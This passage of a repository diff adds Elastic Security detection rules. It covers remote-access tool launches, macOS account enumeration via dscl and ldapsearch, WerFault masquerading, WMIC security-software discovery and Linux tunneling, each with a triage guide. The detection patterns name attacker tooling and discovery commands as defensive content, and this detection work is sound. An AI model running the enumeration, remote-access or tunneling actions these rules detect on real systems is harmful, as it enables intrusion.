to conduct legitimate support or remote access, consider reinforcing that only tooling approved by the IT policy should be used. The analyst can dismiss the alert if no other suspicious behavior is observed involving the host or users.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If an unauthorized third party did the access via social engineering, consider improvements to the security awareness program.\n- Enforce that only tooling approved by the IT policy should be used for remote access purposes and only by authorized staff.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type: \"windows\" and\n\n event.category: \"process\" and event.type : \"start\" and\n\n (\n process.code_signature.subject_name : (\n \"Action1 Corporation\" or\n \"AeroAdmin LLC\" or\n \"Ammyy LLC\" or\n \"Atera Networks Ltd\" or\n \"AWERAY PTE. LTD.\" or\n \"BeamYourScreen GmbH\" or\n \"Bomgar Corporation\" or\n \"DUC FABULOUS CO.,LTD\" or\n \"DOMOTZ INC.\" or\n \"DWSNET O\u00dc\" or\n \"FleetDeck Inc\" or\n \"GlavSoft LLC\" or\n \"GlavSoft LLC.\" or\n \"Hefei Pingbo Network Technology Co. Ltd\" or\n \"IDrive, Inc.\" or\n \"IMPERO SOLUTIONS LIMITED\" or\n \"Instant Housecall\" or\n \"ISL Online Ltd.\" or\n \"LogMeIn, Inc.\" or\n \"Monitoring Client\" or\n \"MMSOFT Design Ltd.\" or\n \"Nanosystems S.r.l.\" or\n \"NetSupport Ltd\" or\n \"NinjaRMM, LLC\" or\n \"Parallels International GmbH\" or\n \"philandro Software GmbH\" or\n \"Pro Softnet Corporation\" or\n \"RealVNC\" or\n \"RealVNC Limited\" or\n \"BreakingSecurity.net\" or\n \"Remote Utilities LLC\" or\n \"Rocket Software, Inc.\" or\n \"SAFIB\" or\n \"Servably, Inc.\" or\n \"ShowMyPC INC\" or\n \"Splashtop Inc.\" or\n \"Superops Inc.\" or\n \"TeamViewer\" or\n \"TeamViewer GmbH\" or\n \"TeamViewer Germany GmbH\" or\n \"Techinline Limited\" or\n \"uvnc bvba\" or\n \"Yakhnovets Denis Aleksandrovich IP\" or\n \"Zhou Huabing\"\n ) or\n\n process.name.caseless : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\"\n ) or\n process.name : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\"\n )\n\t) and\n\n\tnot (process.pe.original_file_name : (\"G2M.exe\" or \"Updater.exe\" or \"powershell.exe\") and process.code_signature.subject_name : \"LogMeIn, Inc.\")\n", + "references": [ + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://attack.mitre.org/techniques/T1219/", + "https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Software", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 5 + }, + "id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_107.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_107.json new file mode 100644 index 00000000000..091fcbb64b3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_107.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of macOS built-in commands related to account or group enumeration. Adversaries may use account and group information to orient themselves before deciding how to act.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration of Users or Groups via Built-in Commands", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n (\n process.name : (\"ldapsearch\", \"dsmemberutil\") or\n (process.name : \"dscl\" and\n process.args : (\"read\", \"-read\", \"list\", \"-list\", \"ls\", \"search\", \"-search\") and\n process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\"))\n\t) and\n not process.parent.executable : (\"/Applications/NoMAD.app/Contents/MacOS/NoMAD\",\n \"/Applications/ZoomPresence.app/Contents/MacOS/ZoomPresence\",\n \"/Applications/Sourcetree.app/Contents/MacOS/Sourcetree\",\n \"/Library/Application Support/JAMF/Jamf.app/Contents/MacOS/JamfDaemon.app/Contents/MacOS/JamfDaemon\",\n \"/Applications/Jamf Connect.app/Contents/MacOS/Jamf Connect\",\n \"/usr/local/jamf/bin/jamf\",\n \"/Library/Application Support/AirWatch/hubd\",\n \"/opt/jc/bin/jumpcloud-agent\",\n \"/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon\",\n \"/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon\",\n \"/Library/PrivilegedHelperTools/com.fortinet.forticlient.uninstall_helper\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_107.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_107.json new file mode 100644 index 00000000000..679d78174ab --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_107.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections.", + "false_positives": [ + "Legit Application Crash with rare Werfault commandline value" + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Windows Error Manager Masquerading", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", + "references": [ + "https://twitter.com/SBousseaden/status/1235533224337641473", + "https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/", + "https://app.any.run/tasks/26051d84-b68e-4afb-8a9a-76921a271b81/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6ea41894-66c3-4df7-ad6b-2c5074eb3df8", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "6ea41894-66c3-4df7-ad6b-2c5074eb3df8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_110.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_110.json new file mode 100644 index 00000000000..0853e24f06a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_110.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Windows Management Instrumentation Command (WMIC) to discover certain System Security Settings such as AntiVirus or Host Firewall details.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Security Software Discovery using WMIC", + "note": "## Triage and analysis\n\n### Investigating Security Software Discovery using WMIC\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `wmic` utility with arguments compatible to the enumeration of the security software installed on the host. Attackers can use this information to decide whether or not to infect a system, disable protections, use bypasses, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(process.name : \"wmic.exe\" or process.pe.original_file_name : \"wmic.exe\") and\nprocess.args : \"/namespace:\\\\\\\\root\\\\SecurityCenter2\" and process.args : \"Get\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "6ea55c81-e2ba-42f2-a134-bccf857ba922_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_5.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_5.json new file mode 100644 index 00000000000..c3038732636 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_5.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Tunneling and/or Port Forwarding", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Tunneling and/or Port Forwarding\n\nAttackers can leverage many utilities to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for several utilities that are capable of setting up tunnel network communications by analyzing process names or command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n- Suspicious Utility Launched via ProxyChains - 6ace94ba-f02c-4d55-9f53-87d99b6f9af4\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling/forwarding for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where 